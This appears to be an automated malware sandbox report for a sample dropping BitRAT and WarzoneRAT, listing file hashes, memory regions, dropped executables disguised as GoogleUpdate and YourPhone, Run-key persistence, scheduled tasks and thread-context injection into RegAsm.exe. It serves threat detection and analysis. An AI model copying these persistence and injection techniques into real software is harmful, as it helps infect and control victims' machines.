| SHA256 | 9415d70f7cf9138449eb2680aef2566dce26dbd20431ab80bba6870fe208eb38 |
| SHA512 | 6cf57bad994790e5b0f2791f6fdfcfff973dcecce284b330070f6e32f67114e89ce8fb893b19193765dfb073fe303b46dff5a83208b72d2b5840a74c7a326aba |
memory/2008-92-0x0000000000000000-mapping.dmp
memory/1572-90-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/1792-96-0x0000000070CC0000-0x000000007126B000-memory.dmp
\Users\Admin\AppData\Local\Temp\$77BitRat.exe
| MD5 | ca607a7fb0fa99f0ef20300deea83d55 |
| SHA1 | f6348167625781bb441dfcbb49f8e65c62144adf |
| SHA256 | 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36 |
| SHA512 | ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6 |
memory/1560-78-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe
| MD5 | f8169767c726f1be7a7e14839cc44d36 |
| SHA1 | 571bcdb58a2017d77593ea1325bac737160b81f4 |
| SHA256 | 1940d88ba94da500a695bc7d3d42a275ec9a7ff700f90d6174991824d71a9377 |
| SHA512 | c1469da2f34315f6cac4a67bb7a8f0ef7846103289f953a47222c8a240279027def56a6fece4ceea78d0b0dfb4f0875f50eca42f5d2ec3e49e1b10bdc84b7a05 |
memory/2008-97-0x0000000000390000-0x0000000000412000-memory.dmp
memory/1472-98-0x0000000000000000-mapping.dmp
memory/1624-99-0x0000000000000000-mapping.dmp
memory/1472-100-0x000007FEFC311000-0x000007FEFC313000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe
| MD5 | ca607a7fb0fa99f0ef20300deea83d55 |
| SHA1 | f6348167625781bb441dfcbb49f8e65c62144adf |
| SHA256 | 612f6d773bd702be0c4fd4ee953da740c98d51f5c1838e92acef61d9cde8cf36 |
| SHA512 | ef4b603b19e196100f07073011970a415c77266c4e4f9e414e967a4c4ef0987e8c718f4d1cf5642496d3ee1aedba6045606e48bb6aad4266bbbed63fe5cf63f6 |
memory/1580-103-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\y1w52pwx\y1w52pwx.cmdline
| MD5 | b3615aa7dcd23c3190e1bba2c2ce0e37 |
| SHA1 | 55cab252d83d2b86f7bde034877c00cf1d1552c3 |
| SHA256 | 1f7cfc1c1f36fb592b0e28711cf7d2b51474ec5d1ffe95df315d81c389b96d69 |
| SHA512 | 8d24b40da010554480eb7340f2e331ad2983fb4ed59dc9bb47b7c4033df80514388aebc4facce9847b6791dff711f147933552837a5228f7df5382a3590e6d03 |
\??\c:\Users\Admin\AppData\Local\Temp\y1w52pwx\y1w52pwx.0.cs
| MD5 | b3a0e87506914a518a26de26cc397a0b |
| SHA1 | 822bf87c58c6a2dcc72689be4a1c9869f4ffabb3 |
| SHA256 | 5118a52b8622770613d8a22dd735d96fcbd76021d12ee9c36b1a78dfa9a5f110 |
| SHA512 | 77077e2e75bee91679c6c71ce8ac82810e9a55c8f5dd01adbc728372cddfc385de664ac51463f7b9fa37a209a685e0b7d719178b90b68ff852e4598510df879c |
memory/1792-106-0x0000000070CC0000-0x000000007126B000-memory.dmp
memory/1996-107-0x0000000070CC0000-0x000000007126B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\RES4AE6.tmp
| MD5 | 8d392b2e8c5a57c271da43346be3b755 |
| SHA1 | 364fad374140d78864c686f53295a0030481b557 |
| SHA256 | a55bab7f12f8282bbf044892f301fc29315f86246eee71d2eba2b286f9cc47a8 |
| SHA512 | e634d9254ae93b85dda6b7c450af802ba6e92a98c0c7eb5d96f232d1408010dacc37fddb4a44e99c80058ceba4f94b951d88451627175bd31c5cc0e13d13613d |
memory/1940-111-0x0000000000000000-mapping.dmp
memory/1476-114-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
| MD5 | 77dfcb6c2834e0bf0aedff8da1d1a0f9 |
| SHA1 | 33fd25bb36a6b9480ac4ea0e0feea2ca109cb457 |
| SHA256 | f7bd87564247b2fd4bc12f1aa618a2a7fc59a50200d0c82dc1c7726c8ad68e5d |
| SHA512 | aabf94dc1f1a83747b9b4cce1bf82a18d65883f27664b91ac49fc59000f243ff35addfc2d590703ff0c7c415caef9105564581f12882da118c5c7eb1fcc20d6c |
memory/2024-119-0x0000000000000000-mapping.dmp
memory/1276-118-0x0000000000130000-0x0000000000138000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\YourPhone.exe
| MD5 | 77dfcb6c2834e0bf0aedff8da1d1a0f9 |
| SHA1 | 33fd25bb36a6b9480ac4ea0e0feea2ca109cb457 |
| SHA256 | f7bd87564247b2fd4bc12f1aa618a2a7fc59a50200d0c82dc1c7726c8ad68e5d |
| SHA512 | aabf94dc1f1a83747b9b4cce1bf82a18d65883f27664b91ac49fc59000f243ff35addfc2d590703ff0c7c415caef9105564581f12882da118c5c7eb1fcc20d6c |
memory/1276-115-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\CSC4F38E3090E14B7DAF50D563E36023E6.TMP
| MD5 | 1d5543c367c49b9dd6366270fdd4ee3a |
| SHA1 | bf1e4c9b270125c4fd6fba63cf9fa92c5b3b8e66 |
| SHA256 | 502b03046eea75f154cee0da9adfb6ca501704b97ef7ac5053de8f0f9f92d4d2 |
| SHA512 | 86c864acdf3b4b457128889d37d6aad9190c53be059f30c7975adc7966c1aaa0b695ed22599aa5f63b2e44c8f5411f861db08b20c9909f4b934c852f064efa04 |
memory/1348-108-0x0000000000000000-mapping.dmp
memory/1472-121-0x000007FEEBAF0000-0x000007FEEC513000-memory.dmp
memory/1472-123-0x0000000001374000-0x0000000001377000-memory.dmp
memory/1472-122-0x000007FEEEA20000-0x000007FEEF57D000-memory.dmp
memory/1472-124-0x000000000137B000-0x000000000139A000-memory.dmp
memory/1472-125-0x0000000077A90000-0x0000000077C39000-memory.dmp
memory/1624-126-0x0000000073AD0000-0x000000007407B000-memory.dmp
memory/1472-128-0x0000000077870000-0x000000007798F000-memory.dmp
memory/1472-127-0x0000000077A90000-0x0000000077C39000-memory.dmp
memory/1196-129-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1196-130-0x0000000140002300-mapping.dmp
memory/1196-132-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1196-133-0x0000000077A90000-0x0000000077C39000-memory.dmp
memory/1196-134-0x0000000077870000-0x000000007798F000-memory.dmp
memory/1196-135-0x0000000140000000-0x000000014002B000-memory.dmp
memory/1196-136-0x0000000077A90000-0x0000000077C39000-memory.dmp
memory/416-137-0x0000000000830000-0x0000000000854000-memory.dmp
memory/416-140-0x000007FEBFBC0000-0x000007FEBFBD0000-memory.dmp
memory/460-149-0x000007FEBFBC0000-0x000007FEBFBD0000-memory.dmp
memory/416-142-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/416-147-0x0000000000830000-0x0000000000854000-memory.dmp
memory/1636-145-0x0000000000000000-mapping.dmp
memory/1028-146-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
memory/2112-158-0x0000000000000000-mapping.dmp
\ProgramData\$77images.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
memory/2144-159-0x0000000000400000-0x0000000000422000-memory.dmp
memory/476-153-0x000007FEBFBC0000-0x000007FEBFBD0000-memory.dmp
memory/1472-154-0x0000000001374000-0x0000000001377000-memory.dmp
memory/460-150-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/416-155-0x0000000000A00000-0x0000000000A2B000-memory.dmp
memory/1624-161-0x0000000077C70000-0x0000000077DF0000-memory.dmp
memory/476-160-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/460-163-0x0000000000100000-0x000000000012B000-memory.dmp
memory/476-164-0x0000000000120000-0x000000000014B000-memory.dmp
memory/2144-166-0x0000000000402597-mapping.dmp
memory/2244-168-0x0000000000000000-mapping.dmp
memory/2144-170-0x0000000000400000-0x0000000000422000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 11ba16e5ee0670ab6d6b482c52b7fdba |
| SHA1 | 5e530389d8005031f990e4dced5797f8cb9703b7 |
| SHA256 | f5d6bc3e79b6b39eaf4bdff7a02ec6adf6d9564f3f56b08ca85f2aca99a6b45b |
| SHA512 | b4d6489671d0ed6ceafc108fcb8b4598667256dec197422499c0687368a71b395fe49af0134371fa81fa0f202cad7cf5d249d45f424dc28f7765dea5a3543f81 |
memory/1472-173-0x000000000137B000-0x000000000139A000-memory.dmp
memory/1472-174-0x0000000077A90000-0x0000000077C39000-memory.dmp
memory/1560-175-0x00000000003B0000-0x00000000003CB000-memory.dmp
memory/1472-176-0x0000000077870000-0x000000007798F000-memory.dmp
memory/1560-180-0x00000000003B0000-0x00000000003CB000-memory.dmp
memory/1560-182-0x00000000003D0000-0x00000000003F0000-memory.dmp
memory/568-185-0x0000000002890000-0x00000000029EE000-memory.dmp
memory/2144-187-0x0000000000400000-0x0000000000422000-memory.dmp
memory/2144-189-0x0000000077C70000-0x0000000077DF0000-memory.dmp
memory/1636-192-0x0000000073AD0000-0x000000007407B000-memory.dmp
memory/1572-196-0x0000000002880000-0x00000000028A0000-memory.dmp
C:\ProgramData\$77images.exe
| MD5 | 48092158c6601dba353421f70d501025 |
| SHA1 | 01d0d5149e9b690a84554fb4ac72fdbdad6d56d2 |
| SHA256 | 9750babc3722fe3f50c953a34c6c06f4483321e5e325e61c1c0a434200a03405 |
| SHA512 | b2b002ce5d0464a0e765b039f486f81b9ef1ddce3f809d91f9430554b1430bd775bebc1c5a4f60951313ff8ed97bd3de05df3478ecbb907b308c7ca38fe65434 |
memory/1636-198-0x0000000004C20000-0x0000000004C40000-memory.dmp
memory/2112-199-0x0000000000090000-0x00000000000B0000-memory.dmp
memory/2144-200-0x0000000000140000-0x0000000000160000-memory.dmp
memory/1624-201-0x0000000000CE0000-0x000000000192A000-memory.dmp
memory/1624-202-0x00000000032E0000-0x0000000003300000-memory.dmp
memory/1624-203-0x0000000073AD0000-0x000000007407B000-memory.dmp
memory/1196-204-0x0000000077A90000-0x0000000077C39000-memory.dmp
memory/416-205-0x0000000000A00000-0x0000000000A2B000-memory.dmp
memory/1636-197-0x0000000004F60000-0x00000000055B1000-memory.dmp
memory/1636-206-0x0000000073AD0000-0x000000007407B000-memory.dmp
memory/1624-207-0x0000000077C70000-0x0000000077DF0000-memory.dmp
memory/460-208-0x0000000000100000-0x000000000012B000-memory.dmp
memory/476-209-0x0000000000120000-0x000000000014B000-memory.dmp
memory/568-210-0x0000000002890000-0x00000000029EE000-memory.dmp
memory/484-212-0x000007FEBFBC0000-0x000007FEBFBD0000-memory.dmp
memory/484-237-0x0000000000360000-0x000000000038B000-memory.dmp
memory/484-240-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/576-243-0x0000000000430000-0x000000000045B000-memory.dmp
memory/576-246-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/652-252-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/652-249-0x0000000000520000-0x000000000054B000-memory.dmp
memory/744-257-0x0000000000A10000-0x0000000000A3B000-memory.dmp
memory/744-263-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/800-268-0x0000000000840000-0x000000000086B000-memory.dmp
memory/800-275-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/832-281-0x00000000008C0000-0x00000000008EB000-memory.dmp
memory/832-286-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/872-290-0x0000000000A40000-0x0000000000A6B000-memory.dmp
memory/296-296-0x0000000001B90000-0x0000000001BBB000-memory.dmp
memory/340-293-0x0000000000130000-0x000000000015B000-memory.dmp
memory/1168-306-0x0000000001E10000-0x0000000001E3B000-memory.dmp
memory/1168-307-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/1036-304-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
memory/1036-300-0x00000000007A0000-0x00000000007CB000-memory.dmp
memory/1256-308-0x0000000001BB0000-0x0000000001BDB000-memory.dmp
memory/1340-310-0x0000000002780000-0x00000000027AB000-memory.dmp
memory/1256-309-0x0000000037AD0000-0x0000000037AE0000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-12-15 13:24
Reported
2022-12-15 13:27
Platform
win10v2004-20220901-en
Max time kernel
27s
Max time network
130s
Command Line
Signatures
BitRAT
WarzoneRat, AveMaria
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77Install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77WarZone.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
| N/A | N/A | C:\ProgramData\$77images.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MSBuilds.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name" | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77Install name = "C:\\Users\\Admin\\AppData\\Local\\$77Install path\\$77Install name渀" | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77INJECTOR = "C:\\Users\\Admin\\AppData\\Roaming\\$77INJECTOR\\$77INJECTOR.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\$77BitRat.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5036 set thread context of 2416 | N/A | C:\Users\Admin\AppData\Local\Temp\ff64fcc6ccbb482ca0bdf539c492555de86bf3666a8f7979c9d052225be0589c.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4432 set thread context of 4260 | N/A | C:\Users\Admin\AppData\Local\Temp\$77icaro.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\GoogleUpdate.dll | C:\Users\Admin\AppData\Local\Temp\$77GoogleUpdate.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "888" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "10524" | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 14000000070000000100010007000000140000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f8c000000000000002000000e6070c004100720067006a00620065007800200033000a005600610067007200650061007200670020006e00700070007200660066000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001600000074ae2078e323294282c1e41cb67d5b9c0000000000000000000000000fcc48b78810d90100000000000000000000000000000d20feb05a007600700065006200660062007300670020004a0076006100710062006a006600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000640000000000000002000000e6070c004600630072006e0078007200650066003a002000360037002500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000